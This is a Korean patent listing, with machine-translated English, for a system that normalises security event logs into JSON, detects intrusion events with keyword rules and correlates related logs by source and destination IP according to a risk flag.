KR20170058140A - An analysis system of security breach with analyzing a security event log and an analysis method thereof - Google Patents

An analysis system of security breach with analyzing a security event log and an analysis method thereof Download PDF

Info

Publication number
KR20170058140A
KR20170058140A KR1020150161973A KR20150161973A KR20170058140A KR 20170058140 A KR20170058140 A KR 20170058140A KR 1020150161973 A KR1020150161973 A KR 1020150161973A KR 20150161973 A KR20150161973 A KR 20150161973A KR 20170058140 A KR20170058140 A KR 20170058140A
Authority
KR
South Korea
Prior art keywords
event
log
security
event log
analysis
Prior art date
Application number
KR1020150161973A
Other languages
Korean (ko)
Other versions
KR101788410B1 (en
Inventor
신희창
Original Assignee
(주)이스트소프트
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by (주)이스트소프트 filed Critical (주)이스트소프트
Priority to KR1020150161973A priority Critical patent/KR101788410B1/en
Publication of KR20170058140A publication Critical patent/KR20170058140A/en
Application granted granted Critical
Publication of KR101788410B1 publication Critical patent/KR101788410B1/en

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425Traffic logging, e.g. anomaly detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/30Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
    • H04L63/308Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information retaining data, e.g. retaining successful, unsuccessful communication attempts, internet access, or e-mail, internet telephony, intercept related information or call content

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Technology Law (AREA)
  • Debugging And Monitoring (AREA)

Abstract

본 발명은 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것으로서, 보다 상세하게는 로컬단말기에서 발생하는 보안침해 과정에서 생성되는 이벤트로그를 분석하여 출발지 또는 목적지로 구분된 결과를 관리자에게 제공할 수 있도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것이다.
본 발명에 따르면 다양한 형태의 로컬단말기에 가해지는 보안 침해를 정규화된 이벤트로그로 기록하여 통합 분석할 수 있고, 특정 정보와 연계된 이벤트로그를 분류하여 분석함으로써 쉽게 보안 침해 요소를 파악할 수 있는 효과가 있다.The present invention relates to a system and method for analyzing security violation through security event log analysis. More particularly, the present invention relates to a system and method for analyzing a security violation by analyzing an event log generated in a security violation process occurring in a local terminal, To a security attack analysis system and an analysis method using the security event log analysis.
According to the present invention, it is possible to record security infringement applied to various types of local terminals as a normalized event log and to perform integrated analysis, and to classify and analyze event logs associated with specific information, have.

Description

보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법{AN ANALYSIS SYSTEM OF SECURITY BREACH WITH ANALYZING A SECURITY EVENT LOG AND AN ANALYSIS METHOD THEREOF}TECHNICAL FIELD [0001] The present invention relates to a system and method for analyzing security violation through security event log analysis,

본 발명은 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것으로서, 보다 상세하게는 로컬단말기에서 발생하는 보안침해 과정에서 생성되는 이벤트로그를 분석하여 출발지 또는 목적지로 구분된 결과를 관리자에게 제공할 수 있도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것이다.The present invention relates to a system and method for analyzing security violation through security event log analysis. More particularly, the present invention relates to a system and method for analyzing a security violation by analyzing an event log generated in a security violation process occurring in a local terminal, To a security attack analysis system and an analysis method using the security event log analysis.

정보시스템 자산의 증가와 함께 다양한 환경의 운영체제(OS)나 모바일단말기용 응용 프로그램(APPLICATION), 보안 솔루션이 개발되어 사용되고 있다. 이와 같은 다양한 환경에서 기록되는 보안 이벤트 역시 다양한 형태로 저장되고, 그 용량도 빠른 속도로 커지고 있다.Along with the increase of information system assets, various operating environments (OS), application programs for mobile terminals (APPLICATION), and security solutions have been developed and used. Security events recorded in such various environments are also stored in various forms, and their capacity is also rapidly increasing.

다양한 종류의 로컬단말기에서 발생하는 보안 침해에 관련된 이벤트는 로컬단말기 또는 네트워크상의 감시장치에 의해 이벤트로그로 기록된다. 관리자는 생성된 이벤트로그를 분석하여 보안 침해의 피해를 확인하고, 추가적인 침해를 예방할 수 있도록 조치를 취하게 된다.Events related to security breaches occurring in various types of local terminals are recorded in the event log by a local terminal or a monitoring device on the network. The administrator analyzes the generated event log to check the damage of the security breach, and takes measures to prevent further infringement.

도 1은 종래기술에 따른 네트워크 위험도 종합 분석시스템을 나타낸 블럭도이다.FIG. 1 is a block diagram illustrating a network risk composite analysis system according to the prior art.

도 1의 분석시스템에 포함된 다수의 탐지센서(10)는 각각이 담당하는 네트워크에서 발생하는 보안 이벤트들을 실시간으로 수집하여 해당 보안 이벤트의 목적지IP를 포함하는 로그 파일 형태로 DB에 저장한다. 다수의 탐지센서(10)는 자체적으로 네트워크 보안 운영 방침을 기준으로 관리자 측에서 정한 위험수준 및 신뢰도 연산식을 이용하여 수집한 보안 이벤트에 대한 위험수준과 신뢰도를 산정하고 산정한 위험수준과 신뢰도를 상기 로그 파일에 추가하여 해당 로그 파일을 DB에 저장한다.The plurality of detection sensors 10 included in the analysis system of FIG. 1 collect security events occurring in the respective networks in real time and store them in the DB in the form of a log file including the destination IP of the corresponding security event. The plurality of detection sensors 10 calculates the risk level and reliability of the collected security events using the risk level and reliability calculation formula set by the administrator based on the network security operation policy itself and calculates the calculated risk level and reliability Adds the log file to the log file, and stores the log file in the DB.

로그 파일 정규화부(11)는 상기 각각의 탐지센서(10)의 DB로부터 보안 이벤트의 로그 파일을 수집하여 각각의 보안 이벤트의 로그 파일을 네트워크 보안 운영 방침을 기준으로 관리자 측에서 설정한 정규화 정보를 포함하는 정규화 로그 파일 형태로 변환한다.The log file normalization unit 11 collects log files of the security events from the DBs of the respective detection sensors 10 and stores log files of the security events in the log files of the respective security events as normalization information set by the administrator on the basis of the network security operation policy Into a normalized log file format.

개별 위험도 산정부(13)는 상기 자산가치 산정부(12)에서 보안 이벤트의 정규화 로그 파일에 대응하여 산정한 네트워크의 IT 자산의 자산가치와 해당 정규화 로그 파일로부터 식별되는 위험수준 및 신뢰도를 네트워크 보안 운영 방침을 기준으로 관리자 측에서 정한 위험도 연산식에 대입하여 보안 이벤트들의 개별 위험도를 산정하고, 산정한 위험도가 미리 정한 위험도 이상이면 알람 발생 신호를 출력한다.The individual risk calculating section 13 calculates the risk value and the reliability, which are identified from the asset value of the IT asset of the network and the corresponding normalization log file calculated in correspondence with the normalization log file of the security event in the asset value calculating section 12, Based on the operation policy, it assigns to the risk calculation formula set by the administrator and calculates the individual risk of the security events. If the calculated risk exceeds the predetermined risk, the alarm generation signal is outputted.

그런데 이러한 종래기술에서는 생성된 네트워크 기반 보안 이벤트로그를 분석하여 위험도를 측정하는데, 경우에 따라서는 서로 관련이 있는 다양한 보안 이벤트를 그룹화하여 분석하는 것이 효율적이다. 또한 네트워크 기반의 보안 이벤트로그를 분석하는 종래기술에서는 이와 같은 필요가 있어도 연관된 분석방법을 제공하지 못하기 때문에 효율적인 대처가 어려워지는 문제가 있었다.However, in the related art, the generated network-based security event log is analyzed to measure the risk. In some cases, it is effective to group and analyze various security events related to each other. In addition, in the conventional technology for analyzing the network-based security event log, there is a problem that it is difficult to efficiently cope with such a need because the related analysis method can not be provided.

KRKR 10-111361510-1113615 B1B1

전술한 문제점을 해결하기 위한 본 발명은 로컬단말기 및 네트워크 기반에서 생성되는 다양한 형식의 보안 이벤트로그를 하나의 형식으로 정규화하고, 정규화된 이벤트로그를 JSON 파일 형태로 가공하여 데이터베이스 저장소(NoSQL; Not Only SQL)에 저장하며, 저장된 이벤트로그를 분석하여 보안 침해 요소를 분석하도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법을 제공하는 것을 목적으로 한다.According to an aspect of the present invention, there is provided a method for processing a security event log of various types generated in a local terminal and a network based on a single format, processing a normalized event log into a JSON file, SQL), and analyzing a stored event log to analyze a security violation element, and to provide a security violation analysis system and analysis method using the security event log analysis.

또한 본 발명은 이벤트로그 분석 결과 위험도 플래그에 따라서 출발지 또는 목적지를 기준으로 하여 다양한 이벤트로그의 연계분석을 실시함으로써 보안 침해의 흐름, 위치 및 위협, 취약성 등을 정확하게 파악할 수 있도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법을 제공하는 것을 목적으로 한다.Also, according to the present invention, a security event log analysis is performed so as to accurately grasp the flow of security violation, location, threat, vulnerability, etc. by performing linkage analysis of various event logs based on a source or destination according to a risk flag And to provide a security infringement analysis system and an analysis method thereof.

전술한 문제점을 해결하기 위해 안출된 본 발명은 로컬단말기(200)에서 발생하는 보안 이벤트를 분석하여 관리자에게 제공하는 보안침해 분석시스템으로서, 상기 로컬단말기(200)에 설치된 로컬로그수집부(202)가 수집하여 전송한 이벤트로그를 수신하여 통합로그DB(114)에 저장하는 통합로그수집부(102)와; 상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 로그정규화부(104)와; 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 단일이벤트탐지부(106)와; 상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 부여된 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 연계분석부(108)와; 상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 위험도측정부(110);를 포함한다.The present invention has been made to solve the above-mentioned problems, and it is an object of the present invention to provide a security intrusion analysis system for analyzing a security event occurring in a local terminal and providing the security event to an administrator, An integrated log collecting unit 102 for receiving the event log collected and transmitted and storing the received event log in the integrated log DB 114; A log normalization unit 104 for normalizing the event log received by the integrated log collecting unit 102, converting the received event log into a JSON (JavaScript Object Notation) file format, and storing the normalized event log in the integrated log DB 114, Wow; A single event detection unit 106 for analyzing the normalized event log by referring to a detection rule stored in the event detection rule DB 112 and analyzing whether the event log includes an event recording that may cause security breach; A linkage analysis unit (108) for linking and analyzing a plurality of event logs when a risk flag assigned to an event log to be analyzed by the single event detection unit (106) is a predetermined value; And a risk measurement unit 110 for determining a connection log type of the event log to be detected by referring to the risk flag column of the detection rule stored in the event detection rule DB 112.

상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며, TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그인 것을 특징으로 한다.The normalized event log is composed of data having fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE". TIME is a time of detection of a security event in unix time format, TYPE is the type of security event, HOST is the IP address or host name of the sensor from which the security event was detected, SRC is the origin IP in the security event, DST is the destination IP in the security event, CONTENTS_001 through CONTENTS_004 are security And LINKED_LOGTYPE is defined as the target of the event log to perform linkage analysis. The LINKED_LOGTYPE is an event log in which a security event of a predetermined threshold value or more occurs for a certain period of time before and after a single event occurrence time.

상기 연계분석부(108)는 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 한다.If the risk flag included in the event log to be detected is 1, the association analyzer 108 extracts the SRC from the event log and performs an OR operation between the SRC and the DST on the event log defined in the "LINKED_LOGTYPE & When the risk flag included in the event log to be detected is 2, the DST is extracted from the event log, and the event log defined in "LINKED_LOGTYPE" is subjected to OR operation of SRC and DST If the risk flag included in the event log to be detected is 3, SRC and DST are extracted from the event log, and the event log defined in "LINKED_LOGTYPE" is subjected to an AND operation between SRC and DST And a linkage analysis is carried out.

상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서 상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와, 상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 한다.The single event detection unit 106 performs pattern matching on the CONTENTS_001 to CONTENTS_004 among the data included in the normalized event log through a combination of AND, OR, and NOT operators in a keyword referred to in the event detection rule DB 112 Based detection in which a keyword referred to in the event detection rule DB 112 is pattern-matched with a combination of AND, OR, and NOT operators for the HOST, the SRC, and the DST. .

다른 실시예에 따른 본 발명은 보안침해 분석시스템을 이용한 보안침해 분석방법으로서, 로컬단말기(200)에 설치된 로컬로그수집부(202)가 이벤트로그를 수집하여 전송하면, 통합로그수집부(102)가 수신하여 통합로그DB(114)에 저장하는 제1단계와; 상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 로그정규화부(104)가 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 제2단계와; 단일이벤트탐지부(106)가 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 제3단계와; 위험도측정부(110)가 상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 제4단계와; 연계분석부(108)가 상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 대한 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 제5단계;를 포함한다.According to another embodiment of the present invention, there is provided a security infringement analysis method using a security intrusion analysis system. When the local log collection unit 202 installed in the local terminal 200 collects and transmits event logs, the integrated log collection unit 102, And stores it in the integrated log DB 114; The log normalization unit 104 normalizes the event log received by the integrated log collecting unit 102 and converts the event log into a JSON (JavaScript Object Notation) file, and stores the normalized event log in the integrated log DB 114 A second step of: The single event detection unit 106 analyzes the normalized event log by referring to the detection rule stored in the event detection rule DB 112 and analyzes the normalized event log to determine whether the event log includes an event Step 3; A fourth step of the risk measurement unit 110 determining a joint log type of the event log to be detected by referring to the risk flag column of the detection rule stored in the event detection rule DB 112; And a fifth step of linking and analyzing a plurality of event logs when the linkage analysis unit 108 determines that the risk flag for the event log to be analyzed by the single event detection unit 106 is a predetermined value.

상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며, TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그인 것을 특징으로 한다.The normalized event log is composed of data having fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE". TIME is a time of detection of a security event in unix time format, TYPE is the type of security event, HOST is the IP of the sensor where the security event is detected, SRC is the IP of the origin of the security event, DST is the destination IP in the security event, CONTENTS_001 to CONTENTS_004 are the security event And LINKED_LOGTYPE is defined as a target of event log to perform linkage analysis. It is characterized in that an event in which a security event of a predetermined threshold value or more occurs for a predetermined time before and after a single event occurrence time is logged.

상기 연계분석부(108)는 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 한다.If the risk flag included in the event log to be detected is 1, the association analyzer 108 extracts the SRC from the event log and performs an OR operation between the SRC and the DST on the event log defined in the "LINKED_LOGTYPE & When the risk flag included in the event log to be detected is 2, the DST is extracted from the event log, and the event log defined in "LINKED_LOGTYPE" is subjected to OR operation of SRC and DST If the risk flag included in the event log to be detected is 3, SRC and DST are extracted from the event log, and the event log defined in "LINKED_LOGTYPE" is subjected to an AND operation between SRC and DST And a linkage analysis is carried out.

상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서 상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와, 상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 한다.The single event detection unit 106 performs pattern matching on the CONTENTS_001 to CONTENTS_004 among the data included in the normalized event log through a combination of AND, OR, and NOT operators in a keyword referred to in the event detection rule DB 112 Based detection in which a keyword referred to in the event detection rule DB 112 is pattern-matched with a combination of AND, OR, and NOT operators for the HOST, the SRC, and the DST. .

본 발명에 따르면 다양한 형태의 로컬단말기에 가해지는 보안 침해를 정규화된 이벤트로그로 기록하여 통합 분석할 수 있고, 특정 정보와 연계된 이벤트로그를 분류하여 분석함으로써 쉽게 보안 침해 요소 및 위협, 취약성 등을 파악할 수 있는 효과가 있다.According to the present invention, it is possible to record a security infringement applied to various types of local terminals as a normalized event log and perform an integrated analysis. By classifying and analyzing event logs associated with specific information, security breaches, threats, There is an effect that can be grasped.

또한 시간대별로 이벤트 발생 순서를 정렬하여 보안 침해 시도 과정을 쉽게 확인할 수 있어서 이벤트 분석에 소요되는 인적, 시간적, 물적 자원을 최소화할 수 있는 효과가 있다.In addition, it is possible to easily identify the security breach attempt process by sorting the event occurrence order by time zone, thereby minimizing human, time, and material resources required for event analysis.

도 1은 종래기술에 따른 네트워크 위험도 종합 분석시스템을 나타낸 블럭도.
도 2는 본 발명의 실시예에 따른 보안침해 분석시스템의 구조와 연결상태를 나타낸 블럭도.
도 3은 본 발명의 분석시스템을 이용한 보안침해 분석방법의 과정을 나타낸 순서도.
도 4는 이벤트탐지룰DB에 포함된 탐지룰의 일례를 나타낸 테이블.
도 5a와 5b는 이벤트로그에 대한 연계분석을 한 결과를 나타낸 테이블.1 is a block diagram illustrating a system for analyzing the overall network risk according to the prior art.
FIG. 2 is a block diagram illustrating a structure and a connection state of a security intrusion analysis system according to an embodiment of the present invention; FIG.
3 is a flowchart illustrating a process of a security invasion analysis method using the analysis system of the present invention.
4 is a table showing an example of a detection rule included in the event detection rule DB;
Figures 5A and 5B are tables showing the results of linkage analysis for event logs.

이하에서 도면을 참조하여 본 발명의 실시예에 따른 "보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법"을 설명한다.Hereinafter, a security infringement analysis system and analysis method using security event log analysis according to an embodiment of the present invention will be described with reference to the drawings.

도 2는 본 발명의 실시예에 따른 보안침해 분석시스템의 구조와 연결상태를 나타낸 블럭도이다.FIG. 2 is a block diagram illustrating a structure and a connection state of a security intrusion analysis system according to an embodiment of the present invention.

본 발명의 "보안 이벤트로그 분석을 통한 보안침해 분석시스템"(이하, '분석시스템'이라 함)은 네트워크 기반으로 연결된 원격지의 로컬단말기(200)에서 발생하는 보안 침해 이벤트를 수집하여 분석하고, 분석된 결과를 관리자단말기(300)에게 제공하여 위험요소를 제거하도록 하는 기능을 한다. 경우에 따라서는 네트워크 기반이 아닌 장치들에서 발생하는 보안 이벤트를 수집하여 분석할 수도 있을 것이다. 이 경우에는 실시간으로 보안 이벤트를 수집할 수 없으므로, 일정 주기로 또는 특별한 이벤트 발생시에 이벤트로그를 입력하여 분석할 수 있다.(Hereinafter referred to as "analysis system") of the present invention collects, analyzes, analyzes and analyzes security violation events occurring in a local terminal 200 connected at a remote place connected to the network And provides the result to the administrator terminal 300 to remove the risk factors. In some cases, security events occurring on non-network-based devices may be collected and analyzed. In this case, since security events can not be collected in real time, event logs can be input and analyzed at regular intervals or when special events occur.

로컬단말기(200)에 설치된 로컬로그수집부(202)는 로컬단말기(200)에서 발생하는 다양한 형태의 보안 이벤트를 감시하고, 이벤트에서 생성되는 보안 관련 이벤트 로그(이하 '이벤트로그'라 함)를 수집한다. 로컬로그수집부(202)는 로컬단말기(200)에서 수집한 이벤트로그를 분석시스템(100)으로 전송한다.The local log collection unit 202 installed in the local terminal 200 monitors various types of security events generated in the local terminal 200 and generates a security related event log Collect. The local log collecting unit 202 transmits the event log collected by the local terminal 200 to the analysis system 100.

분석시스템(100)에는 통합로그수집부(102), 로그정규화부(104), 단일이벤트탐지부(106), 연계분석부(108), 위험도측정부(110), 이벤트탐지룰DB(112), 통합로그DB(114)가 포함된다.The analysis system 100 includes an integrated log collection unit 102, a log normalization unit 104, a single event detection unit 106, a linkage analysis unit 108, a risk measurement unit 110, an event detection rule DB 112, , And an integrated log DB (114).

통합로그수집부(102)는 로컬로그수집부(202)로부터 전송된 이벤트로그를 받아서 통합로그DB(114)에 저장한다.The integrated log collection unit 102 receives the event log transmitted from the local log collection unit 202 and stores the received event log in the integrated log DB 114.

로그정규화부(104)는 분석시스템(100)에 저장된 여러 가지 형태의 이벤트로그를 정규화하여 JSON 파일 형태로 통합로그DB(114)에 저장하도록 한다. 로그정규화부(104)는 다양한 형태의 로그 포맷을 텍스트(txt) 로그 형태로 전환하고, 이를 JSON(JavaScript Object Notation) 파일 형태로 정규화한다. JSON 파일은 속성-값 쌍으로 이루어진 데이터 오브젝트를 전달하기 위해 인간이 읽을 수 있는 텍스트를 사용하는 개방형 표준 포맷이다. 비동기 브라우저/서버 통신(AJAX)을 위해, 넓게는 XML을 대체하는 주요 데이터 포맷이다. JSON 파일로 표현할 수 있는 자료의 종류에 큰 제한은 없으며, 특히 컴퓨터 프로그램의 변수값을 표현하는 데 적합하다.The log normalization unit 104 normalizes various types of event logs stored in the analysis system 100 and stores them in the integrated log DB 114 in the form of a JSON file. The log normalization unit 104 converts various types of log formats into a text (txt) log format and normalizes them into a JavaScript Object Notation (JSON) file format. A JSON file is an open standard format that uses human-readable text to convey data objects consisting of attribute-value pairs. For asynchronous browser / server communication (AJAX), it is widely a major data format that replaces XML. There is no particular restriction on the type of data that can be represented in a JSON file, and it is particularly suitable for expressing the value of a variable in a computer program.

본 발명에서 이벤트로그를 JSON 형태로 정규화하는 것은 NoSQL 기반 통합로그DB(114)에 기록하기가 편리하기 때문이다.In the present invention, normalizing the event log in JSON form is convenient for recording in the NoSQL-based integrated log DB 114.

본 발명의 로그정규화부(104)가 정규화하여 저장하는 이벤트로그의 속성은 시간정보나 탐지 센서, 출발지 및 도착지 정보, 송수신되는 컨텐츠, 연계분석 보안 이벤트 대상 등을 나타내는데, 상세한 내용은 후술한다.The attributes of the event log that are normalized and stored by the log normalization unit 104 of the present invention represent time information, a detection sensor, a source and destination information, a content to be transmitted and received, a target of a linkage analysis security event, and the like.

단일이벤트탐지부(106)는 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 정규화된 JSON 파일을 스캔하고, 스캔한 결과를 분석하여 참(true)/거짓(false)을 결정한다. 그리고 단일이벤트탐지부(106)는 분석한 결과가 참일 경우, 이벤트로그 JSON 파일을 가공하여 관리자에게 경고 알람을 보낸다. 본 발명에서 스캔 결과가 참이라는 것은 탐지대상이 되는 이벤트로그에 보안침해의 가능성이 있는 이벤트 기록이 포함되어 있다는 의미이다.The single event detection unit 106 scans the normalized JSON file with reference to the detection rule stored in the event detection rule DB 112 and analyzes the result of the scan to determine true / false. If the result of the analysis is true, the single event detection unit 106 processes the event log JSON file and sends a warning alarm to the administrator. In the present invention, the fact that the scan result is true means that the event log to be detected includes an event log having a possibility of security breach.

연계분석부(108)는 단일이벤트탐지부(106)의 결과가 참인 보안이벤트의 위험도 플래그 속성을 참조하여 연계분석이 필요한 이벤트에 대해서 연계분석을 실시한다. 연계분석이란 보안 이벤트로그에 포함된 필드 중에서 특정 필드를 기준으로 이벤트로그의 연관성을 분석하여 정렬함으로써 다수의 이벤트를 일목 요연하게 관찰할 수 있도록 하는 분석을 의미한다.The linkage analysis unit 108 refers to the risk flag attribute of the security event in which the result of the single event detection unit 106 is true, and performs linkage analysis on an event requiring linkage analysis. Linkage analysis refers to an analysis that makes it possible to clearly observe a number of events by analyzing and sorting the association of event logs based on a specific field among the fields included in the security event log.

본 발명에서는 연계분석 여부를 결정하기 위해서 단일이벤트탐지 결과가 참인 경우, 해당 이벤트탐지룰의 위험도 플래그(FLAG)를 확인한다. 위험도 플래그는 관리자가 설정하는 정보보호지침 및 활동의 경험, CVE(Common Vulnerabilities & Exposures; 공통 보안 취약성 및 노출) 등을 참조하여 결정한다. 위험도 플래그에 따라서 연계분석부(108)는 이벤트로그에 포함된 복수의 이벤트로그를 연계하여 분석 후, 결과를 정렬시킨다.In the present invention, when the single event detection result is true, the risk flag (FLAG) of the event detection rule is checked to determine whether or not to analyze the linkage. The risk flag is determined by referring to the information protection guidelines set by the administrator and the experience of the activity, Common Vulnerabilities & Exposures (CVE), and the like. In accordance with the risk flags, the linkage analysis unit 108 correlates a plurality of event logs included in the event log, analyzes the results, and aligns the results.

위험도측정부(110)는 이벤트탐지룰DB(112)의 특정 컬럼(위험도 플래그 컬럼)을 참조하여 단일 이벤트의 연계로그유형을 결정한다.The risk measurement unit 110 refers to a specific column (risk flag column) in the event detection rule DB 112 to determine a joint log type of a single event.

이벤트탐지룰DB(112)는 이벤트로그에 대한 탐지룰을 저장한다. 탐지룰은 분석시스템(100) 또는 보안업무의 관리자가 결정하여 등록하는 것으로서, 분석시스템(100)에 의해 단일분석 또는 연계분석 대상이 될 이벤트로그를 선택하는 기준이 된다.The event detection rule DB 112 stores a detection rule for the event log. The detection rules are determined and registered by the analysis system 100 or the administrator of the security service, and are a criterion for selecting an event log to be subjected to a single analysis or linkage analysis by the analysis system 100.

도 4는 이벤트탐지룰DB에 포함된 탐지룰의 일례를 나타낸 테이블이다. 탐지룰에 포함되는 각각의 데이터 필드의 의미는 다음의 표 1과 같다.4 is a table showing an example of a detection rule included in the event detection rule DB. The meaning of each data field included in the detection rule is shown in Table 1 below.

이벤트탐지룰DB 컬럼Event detection rule DB column 정의Justice logTypelogType 탐지대상이 되는 보안 이벤트Security events to be detected keywordkeyword 단일 보안 이벤트 탐지에 사용되는 문자열 키워드String keywords used for single security event detection historyhistory 보안 관리자가 기록한 탐지룰의 이력History of the detection rules recorded by the security administrator registertimeregistertime 탐지룰의 생성일Date of creation of detection rule supervisionidsupervisionid 탐지룰을 등록한 보안 관리자/시스템의 고유값The unique value of the security manager / system that registered the detection rule cntcnt 탐지룰의 인덱스 번호Index number of the detection rule flagflag 위험도 플래그Risk flag

